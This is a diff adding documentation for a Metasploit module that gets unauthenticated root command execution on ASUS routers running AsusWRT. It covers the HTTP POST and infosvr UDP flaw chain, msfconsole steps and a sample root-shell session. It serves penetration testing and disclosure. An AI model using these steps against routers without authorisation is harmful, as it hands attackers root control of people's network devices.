|
| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode. |
| 9 | + |
| 10 | + This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user. |
| 11 | + |
| 12 | + This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743. |
| 13 | + |
| 14 | + Numerous ASUS models are reportedly affected, but untested. |
| 15 | + |
| 16 | + |
| 17 | +## Verification Steps |
| 18 | + |
| 19 | + 1. Start `msfconsole` |
| 20 | + 2. `use exploits/linux/http/asuswrt_lan_rce` |
| 21 | + 3. `set RHOST [IP]` |
| 22 | + 4. `run` |
| 23 | + 5. You should get a *root* session |
| 24 | + |
| 25 | + |
| 26 | +## Options |
| 27 | + |
| 28 | + **ASUSWRTPORT** |
| 29 | + |
| 30 | + AsusWRT HTTP portal port (default: `80`) |
| 31 | + |
| 32 | + |
| 33 | +## Scenarios |
| 34 | +msf > use exploit/linux/http/asuswrt_lan_rce |
| 35 | +msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 |
| 36 | +rhost => 192.168.132.205 |
| 37 | +msf exploit(linux/http/asuswrt_lan_rce) > run |
| 38 | + |
| 39 | +[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. |
| 40 | +[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 |
| 41 | +[+] 192.168.132.205:9999 - Success, shell incoming! |
| 42 | +[*] Found shell. |
| 43 | +[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600 |
| 44 | + |
| 45 | +id |
| 46 | +id |
| 47 | +/bin/sh: id: not found |
| 48 | +/ # cat /proc/cpuinfo |
| 49 | +cat /proc/cpuinfo |
| 50 | +system type : Broadcom BCM53572 chip rev 1 pkg 8 |
| 51 | +processor : 0 |
| 52 | +cpu model : MIPS 74K V4.9 |
| 53 | +BogoMIPS : 149.91 |
| 54 | +wait instruction : no |
| 55 | +microsecond timers : yes |
| 56 | +tlb_entries : 32 |
| 57 | +extra interrupt vector : no |
| 58 | +hardware watchpoint : yes |
| 59 | +ASEs implemented : mips16 dsp |
| 60 | +shadow register sets : 1 |
| 61 | +VCED exceptions : not available |
| 62 | +VCEI exceptions : not available |
| 63 | + |
| 64 | +unaligned_instructions : 0 |
| 65 | +dcache hits : 2147483648 |
| 66 | +dcache misses : 0 |
| 67 | +icache hits : 2147483648 |
| 68 | +icache misses : 0 |
| 69 | +instructions : 2147483648 |
| 70 | +/ # |
0 commit comments